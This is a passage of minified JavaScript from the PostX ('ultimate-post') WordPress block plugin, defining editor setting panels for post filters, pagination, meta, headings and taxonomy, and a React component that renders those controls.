Srcset","ultimate-post"),pro:!0},{type:"toggle",key:"imgLazy",label:__("Enable Lazy Loading","ultimate-post"),pro:!0}],O=[{type:"toggle",key:"filterBelowTitle",label:__("Below Title","ultimate-post")},{type:"select",key:"filterType",label:__("Filter Type","ultimate-post"),options:[]},{type:"search",key:"filterValue",label:__("Filter Value","ultimate-post"),multiple:!0,search:"taxvalue"},{type:"text",key:"filterText",label:__("All Content Text","ultimate-post")},{type:"toggle",key:"filterMobile",label:__("Enable Dropdown","ultimate-post"),pro:!0},{type:"text",key:"filterMobileText",label:__("Menu Text","ultimate-post"),help:__("Mobile Device Filter Menu Text","ultimate-post")},{type:"typography",key:"fliterTypo",label:__("Typography","ultimate-post")},{type:"alignment",key:"filterAlign",responsive:!0,label:__("Alignment","ultimate-post"),disableJustify:!0},{type:"tab",key:"fTab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"filterColor",label:__("Color","ultimate-post")},{type:"color",key:"filterBgColor",label:__("Background Color","ultimate-post")},{type:"border",key:"filterBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"filterHoverColor",label:__("Hover Color","ultimate-post")},{type:"color",key:"filterHoverBgColor",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"filterHoverBorder",label:__("Hover Border","ultimate-post")}]}]},{type:"dimension",key:"filterRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"color",key:"filterDropdownColor",label:__("Dropdown Text Color","ultimate-post")},{type:"color",key:"filterDropdownHoverColor",label:__("Dropdown Hover Color","ultimate-post")},{type:"color",key:"filterDropdownBg",label:__("Dropdown Background","ultimate-post")},{type:"range",key:"filterDropdownRadius",min:0,max:300,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Dropdown Radius","ultimate-post")},{type:"dimension",key:"filterDropdownPadding",label:__("Dropdown Padding","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"fliterSpacing",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"fliterPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],R=[{type:"tag",key:"paginationType",label:__("Pagination Type","ultimate-post"),options:[{value:"loadMore",label:__("Loadmore","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")},{value:"pagination",label:__("Pagination","ultimate-post")}]},{type:"text",key:"loadMoreText",label:__("Loadmore Text","ultimate-post")},{type:"text",key:"paginationText",label:__("Pagination Text","ultimate-post")},{type:"alignment",key:"pagiAlign",responsive:!0,label:__("Alignment","ultimate-post"),disableJustify:!0},{type:"select",key:"paginationNav",label:__("Pagination","ultimate-post"),options:[{value:"textArrow",label:__("Text & Arrow","ultimate-post")},{value:"onlyarrow",label:__("Only Arrow","ultimate-post")}]},{type:"toggle",key:"paginationAjax",label:__("Ajax Pagination","ultimate-post")},{type:"select",key:"navPosition",label:__("Navigation Position","ultimate-post"),options:[{value:"topRight",label:__("Top Right","ultimate-post")},{value:"bottomLeft",label:__("Bottom","ultimate-post")}]},{type:"typography",key:"pagiTypo",label:__("Typography","ultimate-post")},{type:"range",key:"pagiArrowSize",min:0,max:100,step:1,responsive:!0,label:__("Arrow Size","ultimate-post")},{type:"tab",key:"pagiTab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"pagiColor",label:__("Color","ultimate-post"),clip:!0},{type:"color2",key:"pagiBgColor",label:__("Background Color","ultimate-post")},{type:"border",key:"pagiBorder",label:__("Border","ultimate-post")},{type:"boxshadow",key:"pagiShadow",label:__("BoxShadow","ultimate-post")},{type:"dimension",key:"pagiRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"pagiHoverColor",label:__("Hover Color","ultimate-post"),clip:!0},{type:"color2",key:"pagiHoverbg",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"pagiHoverBorder",label:__("Hover Border","ultimate-post")},{type:"boxshadow",key:"pagiHoverShadow",label:__("BoxShadow","ultimate-post")},{type:"dimension",key:"pagiHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]},{type:"dimension",key:"pagiMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"navMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"pagiPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],D=[{type:(0,o.o6)()?"toggle":"",label:__("Enable Dynamic Content","ultimate-post"),key:"dcEnabled",help:__("Insert dynamic data & custom fields that update automatically.","ultimate-post")},{type:"advFilterEnable",key:"advFilterEnable",label:__("Advanced Filter","ultimate-post")},{type:"advPagiEnable",key:"advPaginationEnable",label:__("Advanced Pagination","ultimate-post")},{type:"toggle",key:"showImage",label:__("Image","ultimate-post")},{type:"toggle",key:"titleShow",label:__("Title","ultimate-post")},{type:"toggle",key:"metaShow",label:__("Meta","ultimate-post")},{type:"toggle",key:"catShow",label:__("Taxonomy/Category","ultimate-post")},{type:"toggle",key:"excerptShow",label:__("Excerpt","ultimate-post")},{type:"toggle",key:"readMore",label:__("Read More","ultimate-post")},{type:"toggle",key:"headingShow",label:__("Heading","ultimate-post")},{type:"toggle",key:"filterShow",label:__("Filter","ultimate-post")},{type:"toggle",key:"paginationShow",label:__("Pagination","ultimate-post")}],z=[{type:"toggle",key:"titleShow",label:__("Title","ultimate-post")},{type:"toggle",key:"metaShow",label:__("Meta","ultimate-post")},{type:"toggle",key:"catShow",label:__("Taxonomy/Category","ultimate-post")},{type:"toggle",key:"excerptShow",label:__("Excerpt","ultimate-post")},{type:"toggle",key:"readMore",label:__("Read More","ultimate-post")},{type:"toggle",key:"arrows",label:__("Arrows","ultimate-post")},{type:"toggle",key:"dots",label:__("Dots","ultimate-post")},{type:"toggle",key:"headingShow",label:__("Heading","ultimate-post")}],F=[{type:"toggle",key:"showSeoMeta",label:__("SEO Meta","ultimate-post"),pro:!0,help:__("Show Meta from Yoast, RankMath, AIO, SEOPress and Squirrly. Make sure that PostX > Addons > [SEO Plugin] is Enabled.","ultimate-post")},{type:"toggle",key:"showFullExcerpt",label:__("Show Full Excerpt","ultimate-post"),help:__("Show Excerpt from Post Meta Box.","ultimate-post")},{type:"range",key:"excerptLimit",min:0,max:500,step:1,label:__("Excerpt Limit","ultimate-post"),help:__("Excerpt Limit from Post Content.","ultimate-post")},{type:"typography",key:"excerptTypo",label:__("Typography","ultimate-post")},{type:"color",key:"excerptColor",label:__("Color","ultimate-post")},{type:"dimension",key:"excerptPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],W=[{type:"tag",key:"metaPosition",inline:!0,label:__("Meta Position","ultimate-post"),options:[{value:"top",label:__("Top","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]},{type:"select",key:"metaStyle",label:__("Author Style","ultimate-post"),options:[{value:"noIcon",label:__("No Icon","ultimate-post")},{value:"icon",label:__("With Icon","ultimate-post")},{value:"style2",label:__("Style2","ultimate-post")},{value:"style3",label:__("Style3","ultimate-post")},{value:"style4",label:__("Style4","ultimate-post")},{value:"style5",label:__("Style5","ultimate-post")},{value:"style6",label:__("Style6","ultimate-post")}]},{type:"select",key:"metaSeparator",label:__("Separator","ultimate-post"),options:[{value:"dot",label:__("Dot","ultimate-post")},{value:"slash",label:__("Slash","ultimate-post")},{value:"doubleslash",label:__("Double Slash","ultimate-post")},{value:"close",label:__("Close","ultimate-post")},{value:"dash",label:__("Dash","ultimate-post")},{value:"verticalbar",label:__("Vertical Bar","ultimate-post")},{value:"emptyspace",label:__("Empty","ultimate-post")}]},i,{type:"toggle",key:"authorLink",label:__("Enable Author Link","ultimate-post")},{type:"text",key:"metaMinText",label:__("Minute Text","ultimate-post")},{type:"text",key:"metaAuthorPrefix",label:__("Author Prefix Text","ultimate-post")},{...i,key:"metaListSmall",label:__("Small Item Meta","ultimate-post")},{type:"select",key:"metaDateFormat",label:__("Date/Time Format","ultimate-post"),options:[{value:"M j, Y",label:"Feb 7, 2022"},{value:"default_date",label:"WordPress Default Date Format",pro:!0},{value:"default_date_time",label:"WordPress Default Date & Time Format",pro:!0},{value:"g:i A",label:"1:12 PM",pro:!0},{value:"F j, Y",label:"February 7, 2022",pro:!0},{value:"F j, Y g:i A",label:"February 7, 2022 1:12 PM",pro:!0},{value:"M j, Y g:i A",label:"Feb 7, 2022 1:12 PM",pro:!0},{value:"j M Y",label:"7 Feb 2022",pro:!0},{value:"j M Y g:i A",label:"7 Feb 2022 1:12 PM",pro:!0},{value:"j F Y",label:"7 February 2022",pro:!0},{value:"j F Y g:i A",label:"7 February 2022 1:12 PM",pro:!0},{value:"j. M Y",label:"7. Feb 2022",pro:!0},{value:"j. M Y | H:i",label:"7. Feb 2022 | 1:12",pro:!0},{value:"j. F Y",label:"7. February 2022",pro:!0},{value:"j.m.Y",label:"7.02.2022",pro:!0},{value:"j.m.Y g:i A",label:"7.02.2022 1:12 PM",pro:!0}]},{type:"typography",key:"metaTypo",label:__("Typography","ultimate-post")},{type:"color",key:"metaColor",label:__("Color","ultimate-post")},{type:"color",key:"metaHoverColor",label:__("Hover Color","ultimate-post")},{type:"color",key:"metaBg",label:__("Background","ultimate-post")},{type:"color",key:"metaSeparatorColor",label:__("Separator Color","ultimate-post")},{type:"range",key:"metaSpacing",label:__("Meta Spacing Between","ultimate-post"),min:0,max:50,step:1,unit:!0,responsive:!0},{type:"border",key:"metaBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"metaMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"metaPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],V=[{type:"alignment",key:"headingAlign",label:__("Alignment","ultimate-post"),disableJustify:!0},{type:"select",key:"headingStyle",label:__("Heading Style","ultimate-post"),image:!0,options:[{value:"style1",label:__("Style 1","ultimate-post"),img:"assets/img/layouts/heading/hstyle1.png"},{value:"style2",label:__("Style 2","ultimate-post"),img:"assets/img/layouts/heading/hstyle2.png"},{value:"style3",label:__("Style 3","ultimate-post"),img:"assets/img/layouts/heading/hstyle3.png"},{value:"style4",label:__("Style 4","ultimate-post"),img:"assets/img/layouts/heading/hstyle4.png"},{value:"style5",label:__("Style 5","ultimate-post"),img:"assets/img/layouts/heading/hstyle5.png"},{value:"style6",label:__("Style 6","ultimate-post"),img:"assets/img/layouts/heading/hstyle6.png"},{value:"style7",label:__("Style 7","ultimate-post"),img:"assets/img/layouts/heading/hstyle7.png"},{value:"style8",label:__("Style 8","ultimate-post"),img:"assets/img/layouts/heading/hstyle8.png"},{value:"style9",label:__("Style 9","ultimate-post"),img:"assets/img/layouts/heading/hstyle9.png"},{value:"style10",label:__("Style 10","ultimate-post"),img:"assets/img/layouts/heading/hstyle10.png"},{value:"style11",label:__("Style 11","ultimate-post"),img:"assets/img/layouts/heading/hstyle11.png"},{value:"style12",label:__("Style 12","ultimate-post"),img:"assets/img/layouts/heading/hstyle12.png"},{value:"style13",label:__("Style 13","ultimate-post"),img:"assets/img/layouts/heading/hstyle13.png"},{value:"style14",label:__("Style 14","ultimate-post"),img:"assets/img/layouts/heading/hstyle14.png"},{value:"style15",label:__("Style 15","ultimate-post"),img:"assets/img/layouts/heading/hstyle15.png"},{value:"style16",label:__("Style 16","ultimate-post"),img:"assets/img/layouts/heading/hstyle16.png"},{value:"style17",label:__("Style 17","ultimate-post"),img:"assets/img/layouts/heading/hstyle17.png"},{value:"style18",label:__("Style 18","ultimate-post"),img:"assets/img/layouts/heading/hstyle18.png"},{value:"style19",label:__("Style 19","ultimate-post"),img:"assets/img/layouts/heading/hstyle19.png"},{value:"style20",label:__("Style 20","ultimate-post"),img:"assets/img/layouts/heading/hstyle20.png"},{value:"style21",label:__("Style 21","ultimate-post"),img:"assets/img/layouts/heading/hstyle21.png"}]},{type:"tag",key:"headingTag",label:__("Heading Tag","ultimate-post"),options:[{value:"h1",label:"H1"},{value:"h2",label:"H2"},{value:"h3",label:"H3"},{value:"h4",label:"H4"},{value:"h5",label:"H5"},{value:"h6",label:"H6"},{value:"span",label:"span"},{value:"p",label:"p"}]},{type:"text",key:"headingBtnText",label:__("Button Text","ultimate-post")},{type:"text",key:"headingURL",label:__("Heading URL","ultimate-post"),disableIf:()=>(0,o.o6)()},{type:"typography",key:"headingTypo",label:__("Heading Typography","ultimate-post")},{type:"color",key:"headingColor",label:__("Heading Color","ultimate-post")},{type:"color",key:"headingBg",label:__("Heading Background","ultimate-post")},{type:"color",key:"headingBg2",label:__("Heading Background 2","ultimate-post")},{type:"color",key:"headingBorderBottomColor",label:__("Heading Border Color","ultimate-post"),clip:!0},{type:"color",key:"headingBorderBottomColor2",label:__("Heading Border Color 2","ultimate-post"),clip:!0},{type:"range",key:"headingBorder",label:__("Heading Border Size","ultimate-post"),min:1,max:20,step:1},{type:"typography",key:"headingBtnTypo",label:__("Heading Button Typography","ultimate-post")},{type:"color",key:"headingBtnColor",label:__("Heading Button Color","ultimate-post")},{type:"color",key:"headingBtnHoverColor",label:__("Heading Button Hover Color","ultimate-post")},{type:"range",key:"headingSpacing",label:__("Heading Spacing","ultimate-post"),min:1,max:150,step:1,unit:!0,responsive:!0},{type:"dimension",key:"headingRadius",label:__("Heading Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"headingPadding",label:__("Heading Padding","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"toggle",key:"subHeadingShow",label:__("Sub Heading","ultimate-post")},{type:"typography",key:"subHeadingTypo",label:__("Sub Heading Typography","ultimate-post")},{type:"color",key:"subHeadingColor",label:__("Sub Heading Color","ultimate-post")},{type:"dimension",key:"subHeadingSpacing",label:__("Sub Heading Spacing","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"toggle",key:"enableWidth",label:__("Sub Heading Custom Width","ultimate-post")},{type:"range",key:"customWidth",label:__("Sub Heading Max Width","ultimate-post"),min:1,max:1e3,step:1,unit:!0,responsive:!0}],G=[{type:"text",key:"readMoreText",label:__("Read More Text","ultimate-post")},{type:"select",key:"readMoreIcon",label:__("Icon Style","ultimate-post"),svg:!0,options:[{value:"",label:__("None","ultimate-post"),icon:""},{value:"rightAngle",label:__("Angle","ultimate-post"),icon:"rightAngle"},{value:"rightAngle2",label:__("Arrow","ultimate-post"),icon:"rightAngle2"},{value:"rightArrowLg",label:__("Long Arrow","ultimate-post"),icon:"rightArrowLg"}]},{type:"typography",key:"readMoreTypo",label:__("Typography","ultimate-post")},{type:"range",key:"readMoreIconSize",min:0,max:80,step:1,responsive:!0,unit:!0,label:__("Icon Size","ultimate-post")},{type:"tab",key:"rmTab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"readMoreColor",label:__("Color","ultimate-post")},{type:"color2",key:"readMoreBgColor",label:__("Background Color","ultimate-post")},{type:"border",key:"readMoreBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"readMoreRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"readMoreHoverColor",label:__("Hover Color","ultimate-post")},{type:"color2",key:"readMoreBgHoverColor",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"readMoreHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"readMoreHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]},{type:"dimension",key:"readMoreSacing",label:__("Spacing","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"readMorePadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],q=[{type:"select",key:"taxonomy",pro:!0,beside:!0,label:__("Taxonomy","ultimate-post"),options:[]},{type:"select",key:"catStyle",label:__("Taxonomy Style","ultimate-post"),options:[{value:"classic",label:__("Classic","ultimate-post")},{value:"borderLeft",label:__("Left Border","ultimate-post")},{value:"borderRight",label:__("Right Border","ultimate-post")},{value:"borderBoth",label:__("Both Side Border","ultimate-post")}]},{type:"select",key:"catPosition",label:__("Category Position","ultimate-post"),options:[{value:"aboveTitle",label:__("Above Title","ultimate-post")},{value:"topLeft",label:__("Over Image(Top Left)","ultimate-post")},{value:"topRight",label:__("Over Image(Top Right)","ultimate-post")},{value:"bottomLeft",label:__("Over Image(Bottom Left)","ultimate-post")},{value:"bottomRight",label:__("Over Image(Bottom Right)","ultimate-post")},{value:"centerCenter",label:__("Over Image(Center)","ultimate-post")}]},{type:"range",key:"catLineWidth",min:0,max:80,step:1,responsive:!0,label:__("Line Width","ultimate-post")},{type:"range",key:"catLineSpacing",min:0,max:100,step:1,responsive:!0,label:__("Line Spacing","ultimate-post")},{type:"typography",key:"catTypo",label:__("Typography","ultimate-post")},{type:"toggle",key:"customCatColor",label:__("Specific Color","ultimate-post"),pro:!0},{type:"linkbutton",key:"seperatorLink",placeholder:__("Link","ultimate-post"),label:__("Category Specific (Pro)","ultimate-post"),text:"Choose Color"},{type:"toggle",key:"onlyCatColor",label:__("Only Category Text Color (Pro)","ultimate-post")},{type:"tab",key:"cTab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"catColor",label:__("Color","ultimate-post")},{type:"color2",key:"catBgColor",label:__("Background Color","ultimate-post")},{type:"color",key:"catLineColor",label:__("Line Color","ultimate-post")},{type:"border",key:"catBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"catHoverColor",label:__("Hover Color","ultimate-post")},{type:"color2",key:"catBgHoverColor",label:__("Hover Bg Color","ultimate-post")},{type:"color",key:"catLineHoverColor",label:__("Line Hover Color","ultimate-post")},{type:"border",key:"catHoverBorder",label:__("Hover Border","ultimate-post")}]}]},{type:"dimension",key:"catRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"catSacing",label:__("Spacing","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"catPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"range",key:"maxTaxonomy",min:0,max:150,step:1,label:__("Maximum Number of Taxonomy","ultimate-post")}]},5234:(e,t,l)=>{"use strict";l.d(t,{Z:()=>Y});var o=l(67294),a=l(20107),i=l(80118),n=l(69735),r=l(51579),s=l(48054),p=l(6766),c=l(65641),u=l(53613),d=l(26687),m=l(47484),g=l(45009),y=l(61187),b=l(77567),v=l(68477),h=l(41557),f=l(3248),k=l(69811),w=l(17024),x=l(3780),T=l(7928),_=l(86849),C=l(21525),E=l(81931),S=l(68073),P=l(22217),L=l(64390),I=l(42616),B=l(53956),U=l(34774),M=l(60405),A=l(7106),H=l(87025),N=l(59902),j=l(87763),Z=(l(65907),l(83100));const{__}=wp.i18n,{Fragment:O,useState:R,useRef:D,useEffect:z}=wp.element,{TextControl:F,TextareaControl:W,TabPanel:V,Tooltip:G,ToggleControl:q,Notice:$}=wp.components,K="https://www.wpxpo.com/postx/?utm_source=db-postx-editor&utm_medium=quick-query&utm_campaign=postx-dashboard#pricing",J=[{name:"settings",title:"Settings",icon:j.Z.settings3},{name:"style",title:"Style",icon:j.Z.style}],Y=e=>{const{title:t,initialOpen:l,pro:j,data:D,col:z,store:F,youtube:W,doc:Y,depend:X,hrIdx:Q=[],isToolbar:ee,isTab:te,tabData:le,tabs:oe=J,dynamicHelpText:ae}=e,[ie,ne]=(0,N.Z)(),[re,se]=R("no-section"),[pe,ce]=R(""),[ue,de]=R("settings"),me=(e,t,l,o,a)=>{const i=[...e.attributes[t]];return i[l][o]=a,i},ge=e=>te?(0,o.createElement)(V,{onSelect:e=>{(0,H.a2)(t,e),de(e)},initialTabName:(0,H.zC)(t),className:"ultp-accordion-tab ultp-settings-tab-field",tabs:oe},(t=>e(null,!0,!1,!1))):e();function ye(e){if("number"==typeof e)return F.attributes.dcFields[e]?.id;if("object"==typeof e){const{groupIdx:t,fieldIdx:l}=e;return F.attributes.dcFields[t].fields[l].id}}function be(e,t,l){const o=ye(e),a="number"==typeof e?"dcGroupStyles":"dcFieldStyles",i=wp.data.select("core/block-editor").getBlockAttributes(F.clientId),n={...F.attributes[a],[o]:{...i?.[a]?.default,...F.attributes[a][o],...null===t&&"object"==typeof l?l:{[t]:l}}};F.setAttributes({[a]:n})}const ve=(e,t=!0,l=!1,a=!0,N=!1)=>{const j=wp.blocks.getBlockType(F.name),Z=(e||D).filter((e=>!(!a&&!["separator","notice"].includes(e.type))||(te?le&&le[ue]&&le[ue].includes(e.key)||e.tab===ue:void 0)));return N||Q.forEach((e=>{te?e.tab===ue&&e.hr.forEach((e=>{e instanceof Object?e.idx&&e.idx<=Z.length&&Z.splice(e.idx,0,{type:"separator",label:e.label}):e&&e<=Z.length&&Z.splice(e,0,{type:"separator"})})):e<=Z.length&&Z.splice(e,0,{type:"separator"})})),Z.map(((e,a)=>{if(e&&e.disableIf&&e.disableIf(F.attributes))return;let N,Z=null;if(null!=e.dcIdx){const t=ye(e.dcIdx);F.attributes[e.dcParentKey][t]?.hasOwnProperty(e.key)?(N=F.attributes[e.dcParentKey][t][e.key],e.key2&&(Z=F.attributes[e.dcParentKey][t][e.key2])):(N=F.attributes[e.dcParentKey].default[e.key],e.key2&&(Z=F.attributes[e.dcParentKey].default[e.key2]))}else N=l?F.attributes[l.parent_id][l.block_id][e.key]:F.attributes[e.key],e.key2&&(Z=l?F.attributes[l.parent_id][l.block_id][e.key2]:F.attributes[e.key2]);if(!t||void 0===(!1===N||N)||!j.attributes[e.key].style||!1!==((e,t,l)=>{let o=!0,a="";return t.forEach(((t,l)=>{if(t?.hasOwnProperty("depends")){let l="";t.depends.forEach((t=>{"=="==t.condition?o="object"==typeof t.value?t.value.includes(e[t.key]):e[t.key]==t.value:"!="==t.condition?o="object"==typeof t.value?Array.isArray(t.value)?!t.value.includes(e[t.key]):!!e[t.key].lg:e[t.key]!=t.value:"MATCH_VALUE_ONLY"===t.condition&&(o=t.value===e[t.key]),""==l&&0==o&&(l="no")})),o="no"!=l}1==o&&""==a&&(a="yes")})),o="yes"==a,o})(F.attributes,j.attributes[e.key].style,e.key)){if("alignment"==e.type)return(0,o.createElement)(s.Z,{key:a,value:N,label:e.label,alignIcons:e.icons,responsive:e.responsive,disableJustify:e.disableJustify,device:ie,inline:e.inline,options:e.options,toolbar:e.toolbar,setDevice:e=>ne(e),onChange:t=>{null!=e.dcIdx?be(e.dcIdx,e.key,t):F.setAttributes({[e.key]:t})}});if("border"==e.type)return(0,o.createElement)(p.Z,{key:a,value:N,label:e.label,onChange:t=>F.setAttributes({[e.key]:t})});if("boxshadow"==e.type)return(0,o.createElement)(c.Z,{key:a,value:N,label:e.label,onChange:t=>F.setAttributes({[e.key]:t})});if("color"==e.type)return(0,o.createElement)(d.Z,{key:a,value:N,value2:Z,label:e.label,pro:e.pro,inline:e.inline,onChange:t=>{if(e.key2){const l=Array.isArray(t)?{...void 0!==t[0]?{[e.key]:t[0]}:{},...void 0!==t[1]?{[e.key2]:t[1]}:{}}:{[e.key]:t,[e.key2]:t};null!=e.dcIdx?be(e.dcIdx,null,l):F.setAttributes(l)}else null!=e.dcIdx?be(e.dcIdx,e.key,t):F.setAttributes(l?{[l.parent_id]:me(F,l.parent_id,l.block_id,e.key,t)}:{[e.key]:t})}});if("color2"==e.type)return(0,o.createElement)(m.Z,{key:a,value:N,clip:e.clip,label:e.label,pro:e.pro,image:e.image,video:e.video,extraClass:e.extraClass||"",customGradient:e.customGradient||[],onChange:t=>F.setAttributes(l?{[l.parent_id]:me(F,l.parent_id,l.block_id,e.key,t)}:{[e.key]:t})});if("divider"==e.type)return(0,o.createElement)(y.Z,{key:a,label:e.label});if("dimension"==e.type)return(0,o.createElement)(g.Z,{key:a,value:N,min:e.min,max:e.max,unit:e.unit,step:e.step,label:e.label,responsive:e.responsive,device:ie,setDevice:e=>ne(e),onChange:t=>F.setAttributes({[e.key]:t})});if("media"==e.type)return(0,o.createElement)(x.Z,{key:a,value:N,label:e.label,multiple:e.multiple,onChange:t=>F.setAttributes({[e.key]:t})});if("radioimage"==e.type)return(0,o.createElement)(_.Z,{key:a,value:N,label:e.label,isText:e.isText,options:e.options,onChange:t=>F.setAttributes({[e.key]:t})});if("range"==e.type){let t=N;if("queryNumPosts"==e.key&&JSON.stringify(F.attributes[e.key])==JSON.stringify(j.attributes[e.key].default)){const e=F.attributes.queryNumber,l=j.attributes.queryNumber.default;JSON.stringify(e)!=JSON.stringify(l)&&(t={lg:e,sm:e,xs:e},F.setAttributes({queryNumPosts:t}))}return(0,o.createElement)(C.Z,{key:a,_inline:e._inline,metaKey:e.key,value:t,min:e.min,max:e.max,step:e.step,unit:e.unit,label:e.label,pro:e.pro,help:e.help,responsive:e.responsive,device:ie,clientId:e.clientId||"",updateChild:e.updateChild||!1,compact:e.compact,setDevice:e=>ne(e),onChange:t=>{null!=e.dcIdx?be(e.dcIdx,e.key,t):F.setAttributes({[e.key]:t})}})}if("select"==e.type){const t=N;if("queryType"==e.key){const e=F.attributes.queryInclude;e&&"[]"==F.attributes.queryCustomPosts&&"customPosts"!=N&&F.setAttributes({queryType:"customPosts",queryCustomPosts:JSON.stringify(e.split(",").map((e=>({value:e,title:e}))))})}let i=e.options;if("queryTax"==e.key||"queryTaxValue"==e.key||"filterType"==e.key||"filterValue"==e.key||"taxSlug"==e.key||"taxValue"==e.key||"taxonomy"==e.key){let t=[],l=localStorage.getItem("ultpTaxonomy");if(l=JSON.parse(l),"queryTax"==e.key||"filterType"==e.key||"taxonomy"==e.key)l?.hasOwnProperty(F.attributes.queryType)?(l=l[F.attributes.queryType],t=[{value:"",label:"- Select -"}],Object.keys(l).length>0&&(Object.keys(l).forEach((function(e){t.push({value:e,label:e})})),"queryTax"==e.key&&t.push({value:"multiTaxonomy",label:__("Multiple Taxonomy","ultimate-post"),pro:!0,link:K}))):"customPostType"==F.attributes.queryType?(t=[{value:"",label:"- Select -"}],l&&"object"==typeof l&&(Object.keys(l).forEach((function(e){const o=l[e];o&&"object"==typeof o&&Object.keys(o).forEach((function(e){t.some((t=>t.value===e))||t.push({value:e,label:e})}))})),t.push({value:"multiTaxonomy",label:__("Multiple Taxonomy","ultimate-post"),pro:!0,link:K}))):"customPostType"==F.attributes.queryType&&(t=[{value:"",label:"- Select -"}],l&&"object"==typeof l&&(Object.keys(l).forEach((function(e){const o=l[e];o&&"object"==typeof o&&Object.keys(o).forEach((function(e){t.some((t=>t.value===e))||t.push({value:e,label:e})}))})),t.push({value:"multiTaxonomy",label:__("Multiple Taxonomy","ultimate-post"),pro:!0,link:K})));else if("taxSlug"==e.key||"taxValue"==e.key)if("taxSlug"==e.key){const e=[];Object.keys(l).forEach((function(o){Object.keys(o).length>0&&Object.keys(l[o]).forEach((function(l){!1===e.includes(l)&&(t.push({value:l,label:l}),e.push(l))}))}))}else{const e=F.attributes.taxSlug;e&&Object.keys(l).forEach((function(o){l[o].hasOwnProperty(e)&&Object.keys(l[o][e]).forEach((function(e){t.push({value:e,label:e})}))}))}else if(l?.hasOwnProperty(F.attributes.queryType)&&(l=l[F.attributes.queryType],Object.keys(l).length>0)){const o="queryTaxValue"==e.key?"queryTax":"filterType",a=l[F.attributes[o]];void 0!==a&&(Array.isArray(a)||Object.keys(a).forEach((function(e){t.push({value:e,label:a[e]})})))}t.length>0&&(i=t)}const n=l?"":j.attributes[e.key];return(0,o.createElement)(P.Z,{key:a,keys:e.key,value:e.multiple?t?JSON.parse(t.replaceAll("u0022",'"')):[]:t,label:e.label,clear:e.clear,options:i,dynamicHelpText:ae,multiple:e.multiple,responsive:e.responsive,pro:e.pro,help:e.help,image:e.image,svg:e.svg||!1,svgClass:e.svgClass||"",condition:n?.condition||"",clientId:e.clientId||"",updateChild:e.updateChild||!1,device:ie,setDevice:e=>ne(e),beside:e.beside,defaultMedia:e.defaultMedia,onChange:t=>{void 0===n.condition?(e.multiple?F.setAttributes({[e.key]:JSON.stringify(t)}):F.setAttributes(l?{[l.parent_id]:me(F,l.parent_id,l.block_id,e.key,t)}:{[e.key]:t}),"queryTax"==e.key&&N!=t&&F.setAttributes({queryTaxValue:"[]"}),"filterType"==e.key&&N!=t&&F.setAttributes({filterValue:"[]"}),"taxSlug"==e.key&&N!=t&&F.setAttributes({taxValue:"[]"})):F.setAttributes(t)}})}if("tag"==e.type)return(0,o.createElement)(I.Z,{key:a,value:N,layoutCls:e.layoutCls,label:e.label,options:e.options,disabled:e.disabled,inline:e.inline,onChange:t=>F.setAttributes({[e.key]:t})});if("group"==e.type)return(0,o.createElement)(v.Z,{key:a,value:N,label:e.label,options:e.options,disabled:e.disabled,justify:e.justify,inline:e.inline,onChange:t=>F.setAttributes({[e.key]:t})});var R;if("text"==e.type)return(0,o.createElement)(U.Z,{key:a,value:N.replaceAll("&amp;","&"),isTextField:!0,attr:e,DC:null!==(R=e.DC)&&void 0!==R?R:null,onChange:t=>F.setAttributes(l?{[l.parent_id]:me(F,l.parent_id,l.block_id,e.key,t)}:{[e.key]:t})});if("number"==e.type)return(0,o.createElement)(T.Z,{key:a,value:N,min:e.min,max:e.max,unit:e.unit,step:e.step,label:e.label,responsive:e.responsive,device:ie,setDevice:e=>ne(e),onChange:t=>F.setAttributes({[e.key]:t})});if("textarea"==e.type)return(0,o.createElement)(U.Z,{key:a,value:N,isTextField:!1,attr:e,onChange:t=>F.setAttributes({[e.key]:t})});if("toggle"==e.type){let t=e.disabled,i=e.help,n=e.showDisabledValue;return 